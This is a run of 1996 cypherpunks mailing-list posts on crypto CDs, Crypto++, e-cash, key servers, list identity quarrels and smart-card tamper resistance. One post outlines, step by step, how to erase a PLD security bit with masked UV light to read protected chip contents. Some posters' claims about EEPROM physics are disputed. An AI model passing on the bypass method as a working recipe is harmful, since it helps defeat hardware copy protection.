available signed from their authours, especially compiled for various
platforms.

	OTOH, most unknowledgeable people will trust almost anything
(they are already doing so when downloading java applets). And it would
do a great work to spread knowledge about cryptography. Which is a
Good Thing.

	All in all, I think it is a good idea, but addressing the
general public will require quite some work, and the 'connoisseurs'
might either do as Tim (only use the net) or just make their own
mass-store, removable, thingies. Stil I'd bet many people will be
eager to get a mirror of the major sites on CD.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 15:38:09 +0800
To: cypherpunks@toad.com
Subject: Re: Witch Hunts
Message-ID: <ad847f69050210049b0d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Zambini wrote:

>It is also worth noting that the original Detweiller, in a sense, played
>De Sade to Tim May's Rousseau, in that he used an unorthodox, but
>effective, critical technique. (This is, in fact, one reading of De

I don't buy this. If you consult the archives, circa the fall of 1993,
you'll find that while Detweiler/S.Boxx/etc. repeatedly begged me to engage
him in debate, I declined.

So, what was the "effective" part? I thought his insults, rants, forgeries,
screams, shouts, and general gibbering detracted from his real points, such
as they were.

I'm beginning to think there must be a personality type or behavioral
pattern at work here. Others in recent months have also had their ideas
buried in a stream of insults, rants, and CAPITAL LETTERS! The pattern
seems to be the same, though I doubt any of them are Detweiler.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Mon, 1 Apr 1996 06:00:25 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
Message-ID: <960331201326.204003bd@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>> 	Hey, I just got Appl. Crypt. 2nd Ed. yesterday. Meanwhile with
>> the 1st Ed. and the code I had in my CDs I could very well manage with
>> most things, protocols, algorithms... Of course, the version of Crypto++
>> I have there is outdated now, but the algorithms are still valid, and
>> I still have much more algorithms there than the current version has, and
>> I can always plug in or adapt a new one should I need to.
>
>Would you like to suggest some of your favorite algorithms not in the
>current version of Crypto++ for inclusion in the next version?
>
>Wei Dai
>
	Point taken. Well, as it is now, it is good enough for my
current needs. And it's a great work you've done.

	What I was referring to instead was actually what I don't
want or expect in a "good" library: simple, extraneous, old, maybe
breakable algorithms, things no longer useful... they make a great
material for studying and learning, and sometimes to demonstrate
some colleagues how simple some approaches are. These materials,
that I wouldn't use in a decent application are still usefull for
me from time to time, and are nice to have at hand.

	Personally, I would prefer some algorithms not to be in
Crypto++ less someone use them confident that if they are there,
they must necessarily be good, although they might be useful for
learning purposes.

	Nevertheless, as soon as I find something I think interesting
to add, I'll let you know, or even contribute it myself.

	And thanks again for this fine piece of code!

				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 15:43:14 +0800
To: cypherpunks@toad.com
Subject: Tamper-Resistance in VLSI
Message-ID: <ad8483aa060210049afd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:06 AM 4/1/96, Mike Duvos wrote:

>However, I will observe that whenever technology is put forth for
>criticism on this list, there are always a few people who insist
>upon maintaining that anything can be easily defeated.
>
>"All you have to do is <blank>" they exclaim, where <blank> may
>be replaced by "Quantum Factoring", "SQUIDs", "Scanning Tunneling
>Microscopy", "NP=P", "The EPR Effect", "Nanomachines", or some
>other exotic notion which would be lucky if it had even achieved
>a laboratory demonstration under carefully controlled conditions
>much less a practical application to the problem in question.
>
>Common to all such claims is a gross underappreciation of the
>engineering difficulties involved, in this case those related to
>reading logic states buried in a densely integrated digital
>device without destroying them.  Something that isn't easy to do
>even if the device has been designed specifically for the purpose
>of permitting such observation in a laboratory environment.

While I agree that reverse-engineering/analyzing the internal states of
VLSI devices is much harder than some are claiming, it is not the case that
a chip must have been designed with this in mind for it to be possible.
When, then, is it possible, and when is it not? There is no simple answer;
I'd have to look closely at the device, its packaging, how many layers of
metal are involved, the size of the target node to be measured, and a raft
of other things.

>Such distractions, unfortunately, are why good physics rarely
>gets discussed in sci.physics, and why discussions on this list
>about nuclear bomb design, tampering, and hacking frequently take
>off in the crackpot direction.
>
>The bad eventually drives out the good, and few of the competent
>posters are going to continue to comment on a thread which has
>degenerated into the "You don't know anything.  Mr. Squid can
>read your smart card and your brain waves too" level of
>interaction.

Well, this is my third post tonight on this thread. I admit that it has
little to do with practical list issue (but then, what really does?).
Howvever, this happens to be an area of primary expertise for me (device
physics, voltage contrast, SQUIDs, sensing small charges, and
tamper-resistance), so I'm making comments to correct the various
misapprehensions here.

As to tamper-resistance, there is some exciting work being done on
"fingerprinting" of chips, some of which has been publically presented. I'm
under an NDA on some of this, but I can say that the cost of
reverse-engineering a smart card chip or satellite decoder chip is about to
take a quantum leap upward.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 15:53:14 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <ad8485f807021004258a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:56 PM 3/31/96, Randy Catoe wrote:
>>"Perry E. Metzger" <perry@piermont.com> writes:
>>
>> > Or to people with access to scanning microscopy techniques
>> > like STMs or AFMs. I suspect that there are lots of
>> > techniques that can be successfully used. It used to be that
>> > using them required the sort of facilities only available at
>> > a large semiconductor manufacturer, but now I suspect that
>> > it would be easy for a student at a major university, and
>> > probably less easy, but still perfectly feasible, for a
>> > person working at home with lots of sophisticated but fairly
>> > available equipment like STMs.
>>
>The proof would be in the pudding, would it not? Are their
>documented cases of smartcard scavenging?

Intel produced an "encrypted EPROM," for use in coin-op game machines and
in similar applications, in the early 80s. My voltage contrast lab was able
to use our machine (which I invented and my group then developed and
deployed to major sites within Intel) to read the internal data streams out
from internal nodes, thus demonstrating that the system had only moderate
security. Enough security to stop an attacker from attacking a specific
instance of the chip, but enough security to prevent attacks completely.

Does this qualify as a documented case, coming as it does directly from the
guy who lead such a scavenging attack?

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 15:39:54 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <ad84885e08021004b5d4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



thus demonstrating that the system had only moderate security. Enough
security to stop an attacker from attacking a specific instance of the
chip, but enough
                                                                       ^ not
security to prevent attacks completely.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 1 Apr 1996 16:59:52 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <ad847d2604021004131b@[205.199.118.202]>
Message-ID: <199604010508.VAA03496@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > The surface layers above the active portion of a chip can
 > be stripped away and chip remains functional. This includes
 > the outer packaging layers (epoxy, or of course, ceramic
 > with metal lids) and parts of the so-called "scratch
 > protection," usually a type of silicate glass.

 > The active capacitors are not affected by removal of these
 > layers.

True, but removing packaging materials and protective layers is a
long way from imaging the charges tunneled to and from the
floating gates of EEPROM cells, which is the particular
application we are discussing.

Also bear in mind that in a real device, the tamper-resistant
packaging will be considerably more intractable than conventional
semiconductor packaging, and these devices are often designed to
automatically erase all data if signs of tampering are detected.

 > Actually, we did it all the time in my lab at Intel, and I
 > understand from my former co-workers that the technology has
 > only gotten better. (This does not mean voltage contrast is
 > easy. For one thing, modern chips have 3-5 metal layers, due
 > to spectacular advances in chem-mechanical polishing, and
 > each metal layer acts as a ground plane shielding the lower
 > layers from visibility and inspection with electron beams.

Yes.  This is truely impressive technology which continues to
improve with leaps and bounds.  SEM/TEM/STEM voltage-contrast
techniques are a major tool for failure analysis of semiconductor
devices, and AFM instruments can do voltage measurements on
running devices down to nanometer and picosecond resolutions.

 > And EPROM and EEPROM cells are effectively impossible to
 > analyze, for various reasons.)

Correct.  Which is one of the reasons why they are currently the
favored mode of storage for smart card applications.

 > This does not mean I think reverse-engineering of smart
 > cards or satellite boxes is easy.

While I don't necessarily disagree with Perry that sufficiently
advanced technology can reverse-engineer almost anything (the
kind of advanced technology that is indistinguishable from
magick), I think there are practical engineering difficulties in
doing such things today which are either insurmountable or at the
very least a strong indication that there are better ways to
approach the problem.

 > SQUIDs won't do it, either.

At the risk of offending Mr. Squid, I must say that SQUIDs were a
big disappointment given the initial hype and expended research
funds.

BTW, I attempted to read all your writings on "Tamper-Resistant
Modules" in the list archives, but as fate would have it, hks.net
has taken the archives offline for a few days to do some sort of
upgrade.

I did get this very nice Cyber Wallet thing off their Web Page,
however, which uses "DES and Full 768 Bit RSA." Although I must
admit I'm not exactly sure what "full" means in this particular
context. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 1 Apr 1996 23:41:11 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Nasty-Quibble-Punks
Message-ID: <m0u3bwV-0008zJC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:06 PM 3/31/96 -0800, Mike Duvos wrote:
>"Perry E. Metzger" <perry@piermont.com> writes:

>Uh huh.
>
> > Incidently, EEPROMs don't work by simply charging a
> > capacitor or something silly like that. No insulator is
> > perfect, no dielectric is perfect, and charge would
> > eventually leak away were that the case. However, if it
> > were, it would be fairly easy to determine the state of a
> > cell without having to get particularly close to it. Beyond
> > that, there is this insane notion you seem to have that a
> > charged object will lose its charge if the "insulator" is
> > "stripped off" -- I wasn't under the impression a vacuum,
> > for instance, was a particularly good charge carrier.
>
>Uh huh.


Turns out Perry is wrong about this.  I believe that UV EPROMs and probably 
EEPROMs do indeed work by storing charge on a buried, totally-isolated 
capacitor.  The capacitor is charged with a system called "Fowler-Nordheim 
tunneling," which involves placing a relatively high voltage on a nearby 
electrode and causing the thin interface to temporarily conduct.  (It's odd. 
 That's why it's called "tunnelling.")   The charge, surprisingly enough, is 
stable for years, in fact decades, and probably (statistically) centuries at 
room temperature.  The reason the charge stays around so long is that the 
insulator, silicon dioxide, is extremely good.  It has to be.  If the 
capacitor were, say, 1 picofarad, and the resistance was 10E18 ohms (a 
billion gigohms) the resulting time constant would be 1E6 seconds, or about 
12 days.  Since EPROMs obviously hold data far longer than this (well over 
100 times longer, or else our computers wouldn't work!), and since the 
capacitance is probably not nearly 1 pf, that tells you that the effective 
resistance is far above 1E20 ohms.

UVEPROMS are erased, naturally enough, by exposing them to UV light, which 
is usually produced by a mercury vapor lamp.  This UV causes enough 
electrons to be excited into upper electron shells in the insulator to 
temporarily turn it into a slight conductor, and the charge dissipates.  I 
think EEPROMs are erased by, more or less, reversing the voltage on the 
charging electrode.

As for keeping the charge when that insulator is stripped off, that would be 
a problem.  It isn't that a vacuum isn't a good enough insulator; it is, but 
it would be hard to imagine a technique to strip off an SiO2 insulator that 
doesn't also allow a substantial amount of charge to flow.  You could strip 
it off with HF (hydrofluoric acid) but that's electrically conductive.  Even 
a gas-phase process would probably result in enough conductive products to 
discharge the capacitor.  Ion-beam milling would also remove SiO2, but as 
the name implies that's applying a current to the system.

Fortunately, all this is moot:  Since the floating gate is inherently part 
of a transistor, it isn't necessary to expose it to detect its charge state: 
Just activate the transistor in-circuit


BTW, some PLD's have a so-called "security bit" which (when set) is designed 
to prevent reading of the state of the rest of the programmed bits.  Years 
ago it occurred to me that if you knew where this particular bit was stored, 
you could expose this bit location alone to a UV source through a tiny mask 
to discharge it.  Finding that location wouldn't be all that hard:  Just expose 
the chip with a series of exposures, moving a linear mask slightly, and 
eventually the security bit will erase.  Note the location of the mask, and 
rotate the mask 90 degrees and repeat the process.  At that point, you've 
located the bit (this may require a few iterations), so you expose the 
target part through a tiny pinhole (Edmund Scientific sells them in many 
different sizes, exposing only that security bit location.


Jim "Mr. Bell talks about one field" Bell

(Let's see, I covered solid, liquid, and vapor phase chemistry, a bit of 
particle physics (ion-beam milling), semiconductor physics, minor optics, 
electronics, some trivial math, and maybe even some detective work!)

jimbell@pacifier.com









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 1 Apr 1996 15:47:41 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Witch Hunts
In-Reply-To: <199603312326.PAA04845@netcom22.netcom.com>
Message-ID: <Pine.SUN.3.91.960331211245.18816R-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 31 Mar 1996, Vladimir Z. Nuri wrote:

> 
> Bruce Zambini <jlasser@rwd.goucher.edu>
> >If Mr. Unicorn is indeed Detweiller, it is in the mold of Vlad Z. Nuri, 
> >who (while almost certainly Detweiller) has produced useful contributions 
> >on the list, while refraining from acting out.
> 
> sigh. I don't know why this periodic identity madness visits this
> list. does it have something to do with phases of the moon? do you guys
> do harass everyone who hasn't personally attended a cypherpunk
> meeting?

I have personally attended a cypherpunks meeting.  Seems that's not one 
of the required ommissions.

> as for your speculations, all I can say is that Mr. Unicorn is one of
> the many people who seem to have violent prejudices against me posting
> here because of some supposed similarity of my style to this notorious
> Detweiller fellow. so it wouldn't make much sense to me if he was
> really me, er, sorry, Detweiller. <g>

Cute.

> it seems to me that by now, people might have figured out that all this
> silly identity speculation is a total waste of time (and tends only
> to start flamewars) on a list that is
> by official administration and consensus agreement, "anything goes".

Perhaps, if these identity issues tire you so, you should stop fostering 
them?

> in this forum, there is only a message. the messenger is irrelevant.

This, of course, ignores all issues of reputation capital.  The message 
is still only as good as the messenger, which is why I have maintained 
this nym for so long.  Or more accurately, the message is only as good as 
it is heard.  The message is heard in proportion to the reputation 
capital the messenger holds.

> we could all post anonymously and have precisely the same effect. in
> fact, I don't think it would be all that bad of an idea.

I believe this in error.  This is why I work to debunk Mr. Bell, and why 
I don't post with complete anonyminity.  Of course, as you have no 
reputation capital of note, you would be of the view that posting without 
any name at all would be of no worth.  You, like Mr. Bell, have little to 
lose.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Apr 1996 16:25:32 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <ad849a120a021004de9b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:14 PM 3/31/96, Rev. Ben wrote:

>I won't post my opinions upon whom I think is an Agent Provocateur, but
>Uni isn't one.

For what it's worth, I don't think there's a single agent provacateur on
the list. At least not a vocal one (which sort of defeats the point).

While I expect there may be a few government types who subscribe just to
see what's going on (and I don't mean more active subscribers, such as
Brian Davis, even though he's an Assistant District Attorney--he openly
admits his role and makes contributions openly), I've seen no evidence that
anyone is a provacateur.

We're fairly open in our approaches, and are not plotting in secret, so the
role of an agent provacateur is not clear. Disruptors, yes. But one man's
disruption is another man's lively debate. So what else is new.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Mon, 1 Apr 1996 16:12:48 +0800
To: cypherpunks@toad.com
Subject: Re: That's MR. SQUID to YOU
In-Reply-To: <199603312132.PAA18565@einstein.ssz.com>
Message-ID: <9604010311.AA0286@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Jim Choate <ravage@ssz.com> writes:

  > Conductus ...
  > The product under suggestion is called 'Mr. SQUID'...

It's cool ;-)

Although they haven't got a Web page yet, they've got plenty of press
in various places around the net.  Or you can always get product info
from info@conductus.com (or Scott Sachtjen <scotts@conductus.com>, if
info doesn't work).

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Apr 1996 16:35:46 +0800
To: cypherpunks@toad.com
Subject: EMO_ney
Message-ID: <199604010321.WAA09278@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-30-96 Economist, three related E-money reports:

   "Trials of digital cash and smart cards seem to be going on
   everywhere. Who will win the race to control tomorrow's
   money?"

   "Digitising dollars." Citicorp's Electronic Monetary System
   could make all forms of physical money redundant, and, if
   it wins broad acceptance, could help to solve some of the
   financial industry's most intractable problems.

   "The foreign exchange market: illiquid lunch." Diminishing 
   liquidity; settlement risk; impact of electronic brokering.

   EMO_ney









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Mon, 1 Apr 1996 16:14:32 +0800
To: cypherpunks@toad.com
Subject: cryptanalysis questions
Message-ID: <315F4DCA.271C@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


What are the general methods used for statistical analysis of ciphers? 
Should I just use conventional stat analysis and look for patterns? Does 
anyone have any source or programs that do some of these kinds of 
things? 
-- 
thecrow@iconn.net
"It can't rain all the time"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 2 Apr 1996 00:20:43 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Nasty-Quibble-Punks
In-Reply-To: <m0u3bwV-0008zJC@pacifier.com>
Message-ID: <199604010642.WAA27208@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:

 > Turns out Perry is wrong about this.

Shhhh.  Never say the "w-word" in front of Perry. :)

 > I believe that UV EPROMs and probably EEPROMs do indeed
 > work by storing charge on a buried, totally-isolated
 > capacitor.

That is correct.  A very thin layer of dielectric material is
placed on top of a MOS gate.  This "floating gate" can be charged
by applying enough voltage for electrons to tunnel through the
dielectric and charge the gate, which switches the transistor. In
the EPROM, the stored electrons can be given enough energy from
exposure to ultraviolet light to tunnel back out which erases the
device.

Unfortunately, as the geometry shrinks, a longer and longer
exposure to the light is required for erasure, which becomes
annoyingly long for sub-micron technologies.

 > The capacitor is charged with a system called
 > "Fowler-Nordheim tunneling," which involves placing a
 > relatively high voltage on a nearby electrode and causing
 > the thin interface to temporarily conduct.

Almost.  The EEPROM is an advance over the EPROM which permits
the device to be erased electrically.  Fowler-Nordheim Tunneling
is an effect whereby low energy electrons can sneak through the
dielectric in the presence of a very high electric field.  In the
EEPROM, this is used to discharge the floating gates in place of
the UV exposure.  Programming is still done by applying a voltage
high enough to tunnel through the dielectric as in the EPROM.

 > The charge, surprisingly enough, is stable for years, in
 > fact decades, and probably (statistically) centuries at room
 > temperature.

I've never done any calculations, but the charge stays around
"long enough."

The major drawback is that the dielectric is very thin, and
degrades after after hundreds of thousands or millions of write
cycles to the point where the floating gate can no longer retain
a charge.  Therefore such devices are limited in the number of
write cycles they can undergo before wearing out.

 > UVEPROMS are erased, naturally enough, by exposing them to
 > UV light, which is usually produced by a mercury vapor
 > lamp.  This UV causes enough electrons to be excited into
 > upper electron shells in the insulator to temporarily turn
 > it into a slight conductor, and the charge dissipates.  I
 > think EEPROMs are erased by, more or less, reversing the
 > voltage on the charging electrode.

It's more of a case of the trapped electrons absorbing a high
energy photon and getting enough energy to tunnel through the
dielectric, but you have the general idea.  EEPROM erasure is as
described above.

 > As for keeping the charge when that insulator is stripped
 > off, that would be a problem.  It isn't that a vacuum isn't
 > a good enough insulator; it is, but it would be hard to
 > imagine a technique to strip off an SiO2 insulator that
 > doesn't also allow a substantial amount of charge to flow.
 > You could strip it off with HF (hydrofluoric acid) but
 > that's electrically conductive.  Even a gas-phase process
 > would probably result in enough conductive products to
 > discharge the capacitor.

The charge is minute, the dielectric is thin, and damage to the
dielectric would leak the charge.  I'm not sure what a secondary
electron spectrum from a beam that penetrated the dielectric
would disclose about the charge on the gate, but I would tend to
think the dielectric would interfere with tunneling or atomic
force instruments trying to take such measurements.  Again, this
is Tim's area of expertise, and he can probably give you the gory
details on why the state of such devices is difficult to image.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Tue, 2 Apr 1996 16:42:08 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Americans feel no compulsion ...
In-Reply-To: <ad7f454f2a0210043b38@[205.199.118.202]>
Message-ID: <315F53DC.4685@together.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May wrote:
> 
> At 12:21 AM 3/28/96, Syed Yusuf wrote:
> >If a person who speaks three languages is tri-lingual
> >If a person who speaks two languages is bi-lingual
> >
> >What do you call a person who only speaks one language?
> >
> >---------------------answer follows:
> >
> >An American.
> 
> Or our version:
> 
> What do you call a person who has to learn English as a second language in
> order to compete in the world?
> 
> A foreigner.
> 
> (Sorry for the insult, but it seems that this thread is bringing out
> insults from foreigners of all sorts.)
> 
> --Tim

 I suppose this thing could go on and on and on and be argued in many ways,
but I have to side with Tim here. I would add that America started out a
scant 300 or so years ago, we are what we are because we worked at it. If
we speak a language and most of the 200+ million Americans do, and we are
a dominant factor in the world today .... why should we learn another
language. I learned VietNamese when I went off to war. I learned Russian
for the hell of it after taking several courses in Russian history. I have
learned some French out of courtesy and survival when I go to Montreal (but
a 90 minute drive from here). If I were not going any of these places why
would I learn another language, why waste the time? Let me turn it around;
If I were in downtown Moscow what moral highground could justify that I
demand the locals speak English to me? By what right does anyone demand that 
the 70-80% of Americans who will never have a need for a second langauge
learn one?

- -- 
 Brian B. Riley --> http://www.together.com/~brianbr
  "If this is the first day of the rest of my life, I am in DEEP trouble!"



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Chance smiles upon the prepared mind
Comment: PGP Key IDs: 2047/0x17c2b699 1024/0x662A7641

iQCVAwUBMV9TwjTEZIFmKnZBAQEqKwQAqo9pHdxO4jZAvS+HsoZkiNQIX+zSN3PV
bTWt/ro/Xs2BCFSQy8eI/1K0iNNqXkrHyoH4WymCD+zKXKB5ex3CqV3B7Kuqm4te
HbupKSPfXw9FbCteqmgMBjytBSDKWqa82gHv7SKrPyKhxr+jvJP1enHDvZRAeNW9
gMc6GxZYrdI=
=8Rg9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Mon, 1 Apr 1996 17:25:48 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: What backs up digital money?
Message-ID: <v02140b00ad83cdfd77da@[165.254.158.226]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:25 3/28/96, Black Unicorn wrote:

>> > At 1:46 PM 3/27/96, Scott Schryvers wrote:

>> Between those times the net amount
>> of money in bank accounts was reduced, by exactly the amount of
>> circulating dcash.
>
>Ditto uncashed checks.

Only Teller's/Cashier's and Traveler's Checks. These represent the
conversion of Cash into a promise to pay when the Check is presented. This
is the same as dcash. An Uncashed Personal Check (unless it has been
certified [which withdraws the money from the account at Certification
time]) only represents an unsecured claim on the monies in the account (ie:
the Bank has no knowledge of its existence or amount until it is presented
for payment/clearance).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chein-hsinLiu <r3506010@cml11.csie.ntu.edu.tw>
Date: Mon, 1 Apr 1996 02:41:51 +0800
To: cypherpunks@toad.com
Subject: Question about integrity of Blind Signature
Message-ID: <199603311551.XAA01495@cml11.csie.ntu.edu.tw>
MIME-Version: 1.0
Content-Type: text/plain


  Hi!
I have some question about ecash protocol. In ecash protocol, we represent
money by a sequence number which is signed by bank. And for privacy, we
use blind signature. But when we send bank a pesudo sequence number--
X*PK(r) (X:sequence number we want, r :random number to cheat bank)
then we can get SK(X*PK(r)) from bank, and get money by SK(X*PK(r))/r=SK(X).
But if we divide SK(X*PK(r)) with r', we can get another money? It confuses
me. How does it preserve the integrity of the money, and let people divide
r on the SK(X*PK(r)) ?
  It confuses me very long time. Thanks for any help!
  Chein-hsin Liu 4/1/96




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Casey Moss <caseym@genesisnetwork.net>
Date: Fri, 27 Jun 1997 00:42:22 -0700 (PDT)
To: caseym@genesisnetwork.net
Subject: Web Site reporting
Message-ID: <3.0.1.32.19960317004438.00676a24@webb.genesisnetwork.net>
MIME-Version: 1.0
Content-Type: text/plain


Something your web site cannot do without.

http://www.genesisnetwork.net/report/report.htm

Comprehensive web site reporting





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 1 Mar 96 08:06:47 PST
To: adam@lighthouse.homeport.org (Adam Shostack)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <199603010356.WAA10509@homeport.org>
Message-ID: <199603011603.IAA16596@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
> 
> In suggesting key:// urls, I (without commenting) placed a path of
> /s/telnetd/ in a URL.  I was considering that a telnetd might need
> many keys and associated documents, all of which could be found in a
> directory.
> 
> 	gateway's master telnetd public key.
> 	daily keys
> 	policy statements about who may connect, or how
> 	etc
> 
> I expect that we could extend the syntax in such a way that a URL
> could contain most of the data we need.  Thus, the default document
> might be a 'cert of the day,' with possibly with references within the
> certificate to the master telnetd key, the hosts master key.
> 
> 	To expand, I was thinking of:
> 
> 	key://foo.bar.com/{u,s,h,d}/family/instance


While that would be useful in a lot of cases, I would hope that
all that path gunk wouldn't be required.... most people would
have one key, at least initially, and so a simple

key://foo.bar.com/username/key.asc

would be enough for them.  I wouldn't want to prevent people
from using your system, in fact it's a good idea.  I just don't think
that it should be required, just recommended.

Something else to add would be a specifier for the type of key, i.e.

key://slack.lne.com/pgp/ericm/key.asc

The reason for the keytype specifier is obvious, so that the
system can support more than just PGP keys.  The problem with
the above example is that the 'pgp' part is imbedded in the path.
Since the apps that read these key URLS need to know which ones
are for PGP and which for DH or DSS or whatever, the keytype
specifier needs to be in a standard location in the URL.

Suggestions?  maybe key:/pgp/slack.lne.com/ericm/key/asc?
 

Finally, a question:  should the keyserver be able to serve
keys in a way that is secure from a MITM attack, or can it depend
on the certificate chain in the key certificate itself to
validate the key certificate?  I think it can, but I am not
sure, so perhaps someone smarter than I can explain why, or why not.

The attraction is obvious, if the key server doesn't have to
validate the keys it serves, the whole problem of distributed
key servers becomes much easier.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurence Lundblade <lgl@qualcomm.com>
Date: Fri, 1 Mar 96 09:15:27 PST
To: cme@cybercash.com (Carl Ellison)
Subject: Re: A brief comparison of email encryption protocols
In-Reply-To: <v02140b17ad5bacd3a265@[204.254.34.231]>
Message-ID: <v03005200ad5cdf652707@[129.46.110.231]>
MIME-Version: 1.0
Content-Type: text/plain


The database size is really only half the problem I think.  The bigger
problem is managing the database.  I can't quite see it being possible to
have one organization serve as a distribution point for all keys. With
millions of billions of certs, you're going to have having thousands or
millions of database updates on a daily basis.

It does seem though that if you can truly eliminate revocations then things
